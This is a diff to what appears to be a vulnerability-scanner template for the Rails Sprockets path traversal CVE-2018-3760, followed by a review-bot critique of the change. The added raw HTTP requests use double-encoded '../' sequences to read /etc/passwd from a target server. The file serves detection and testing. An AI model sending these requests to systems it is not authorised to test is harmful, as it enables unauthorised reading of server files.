diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 779c5ee4ec..ff39f6696f 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -1,22 +1,46 @@ id: CVE-2018-3760 info: - name: Rails CVE-2018-3760 - author: 0xrudra + name: Ruby On Rails Path Traversal + author: 0xrudra,pikpikcu severity: high + reference: | + - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 + - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf + - https://seclists.org/oss-sec/2018/q2/210 + - https://xz.aliyun.com/t/2542 + description: | + Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. + There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. tags: cve,cve2018,rails,lfi requests: - - method: GET - path: - - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd" + - raw: + - | + GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 + + - | + GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + + extractors: + - type: regex + name: path + internal: true + part: body + regex: + - "/etc/passwd is no longer under a load path: (.*?)," matchers-condition: and matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status status: - 200 - - type: regex - regex: - - "root:[x*]:0:0:" - part: body
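Review bot: the first raw request sends `Content-Length: 94` on a GET that carries no body, which is wrong on its face (there are no 94 bytes to read) and can leave a strict server waiting for a body or rejecting the request; drop that header line, as the second request already does. Two further points in the same hunk. The second request hardcodes six `%252e%252e/` segments after `{{path}}`, so the traversal only reaches `/etc/passwd` when the extracted load path is at most six directories deep; either generate the traversal from the extracted path or document the assumption in a comment next to the request. And `reference: |` turns the four references into one literal string whose lines happen to start with `- `; make it a real YAML list (`reference:` followed by the `- https://...` items) so tooling that consumes the field sees four entries. Minor: the matcher regex changed from `root:[x*]:0:0:` to `root:[x*]:0:0`, which is looser than before; and the description's "read or execute any file" overstates what the template checks, since both requests only demonstrate reading `/etc/passwd` via the path leaked in the "no longer under a load path" error.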